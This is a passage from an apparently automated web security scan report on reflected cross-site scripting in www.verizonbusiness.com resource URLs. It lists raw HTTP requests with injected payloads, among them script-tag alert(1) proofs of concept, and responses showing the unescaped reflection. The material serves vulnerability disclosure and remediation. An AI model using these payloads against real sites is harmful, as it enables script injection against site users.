The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61150'%3bc74d7dead61 was submitted in the REST URL parameter 1. This input was echoed as 61150';c74d7dead61 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources61150'%3bc74d7dead61/1002a1a4-111-Education.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:17:57 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources61150';c74d7dead61/1002a1a4-111-Education.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.562. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a4-111-Education.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0a24"%3b3f5a4a4a495 was submitted in the REST URL parameter 1. This input was echoed as f0a24";3f5a4a4a495 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesf0a24"%3b3f5a4a4a495/1002a1a4-111-Education.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:49 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesf0a24";3f5a4a4a495/1002a1a4-111-Education.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.563. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a4-111-Education.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 638b2</script><script>alert(1)</script>930eacbee47 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a1a4-111-Education.xml638b2</script><script>alert(1)</script>930eacbee47 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "c7894ffaf366beb4034b36f63dbe793f"
Last-Modified: Wed, 17 Nov 2010 00:18:56 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:18:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dc142cd0a-f8a4-45bf-8704-ed4a9f90e1eb|VTID%3dc6f5e5b6-9f1c-48f3-9d4f-93fd24531a4a|SX%3d1289954336|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:22:40 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:18:56 GMT
Content-Length: 40880

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/resources/1002a1a4-111-Education.xml638b2</script><script>alert(1)</script>930eacbee47</url>
...[SNIP]...

1.564. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a4-111-Education.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88e74'%3b271529db7b8 was submitted in the REST URL parameter 2. This input was echoed as 88e74';271529db7b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/88e74'%3b271529db7b8 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/88e74';271529db7b8'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.565. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a5-111-Government.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fd87'%3b84badb62bc0 was submitted in the REST URL parameter 1. This input was echoed as 1fd87';84badb62bc0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources1fd87'%3b84badb62bc0/1002a1a5-111-Government.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:20:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:20:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:20:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources1fd87';84badb62bc0/1002a1a5-111-Government.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.566. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a5-111-Government.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ffbf"%3b32e89247ea2 was submitted in the REST URL parameter 1. This input was echoed as 7ffbf";32e89247ea2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources7ffbf"%3b32e89247ea2/1002a1a5-111-Government.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:19:59 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources7ffbf";32e89247ea2/1002a1a5-111-Government.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEME
...[SNIP]...

1.567. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a5-111-Government.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa795</script><script>alert(1)</script>5f1abd8099b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a1a5-111-Government.xmlaa795</script><script>alert(1)</script>5f1abd8099b HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "d340538f60a0b9333915b09a41ea9c85"
Last-Modified: Wed, 17 Nov 2010 00:22:33 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:22:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3db6ba3563-55e5-4e0c-8f9c-089cf063d496|VTID%3d5fce2f6b-6796-47f7-9448-851079c4e02f|SX%3d1289954552|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:26:16 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:22:33 GMT
Content-Length: 52487

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<url>/resources/1002a1a5-111-Government.xmlaa795</script><script>alert(1)</script>5f1abd8099b</url>
...[SNIP]...

1.568. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a5-111-Government.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b0c2'%3bbb7a8cb1aba was submitted in the REST URL parameter 2. This input was echoed as 8b0c2';bb7a8cb1aba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/8b0c2'%3bbb7a8cb1aba HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:43 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/8b0c2';bb7a8cb1aba'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.569. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a6-111-Retail.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44b01"%3b9f30837d83d was submitted in the REST URL parameter 1. This input was echoed as 44b01";9f30837d83d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources44b01"%3b9f30837d83d/1002a1a6-111-Retail.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources44b01";9f30837d83d/1002a1a6-111-Retail.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.570. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a6-111-Retail.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84224'%3b99ba7759ed6 was submitted in the REST URL parameter 1. This input was echoed as 84224';99ba7759ed6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources84224'%3b99ba7759ed6/1002a1a6-111-Retail.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources84224';99ba7759ed6/1002a1a6-111-Retail.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.571. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a6-111-Retail.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e93a8'%3bb2f3f707bb6 was submitted in the REST URL parameter 2. This input was echoed as e93a8';b2f3f707bb6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/e93a8'%3bb2f3f707bb6 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources/e93a8';b2f3f707bb6'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.572. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a6-111-Retail.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2e8</script><script>alert(1)</script>66a96c5beb9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a1a6-111-Retail.xmlef2e8</script><script>alert(1)</script>66a96c5beb9 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "05fcc58cf2564d35ff1f44cfcfb938ce"
Last-Modified: Wed, 17 Nov 2010 00:21:49 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d780ea2ca-2134-471c-9c87-83fa5465c8ad|VTID%3dee55a3ba-ddb2-4d2d-ae86-b58967f38085|SX%3d1289954509|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:33 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:21:49 GMT
Content-Length: 36530

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/resources/1002a1a6-111-Retail.xmlef2e8</script><script>alert(1)</script>66a96c5beb9</url>
...[SNIP]...

1.573. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a7-111-Energy+and+Utilities.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f51a"%3b62577d24586 was submitted in the REST URL parameter 1. This input was echoed as 4f51a";62577d24586 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources4f51a"%3b62577d24586/1002a1a7-111-Energy+and+Utilities.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources4f51a";62577d24586/1002a1a7-111-Energy+and+Utilities.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

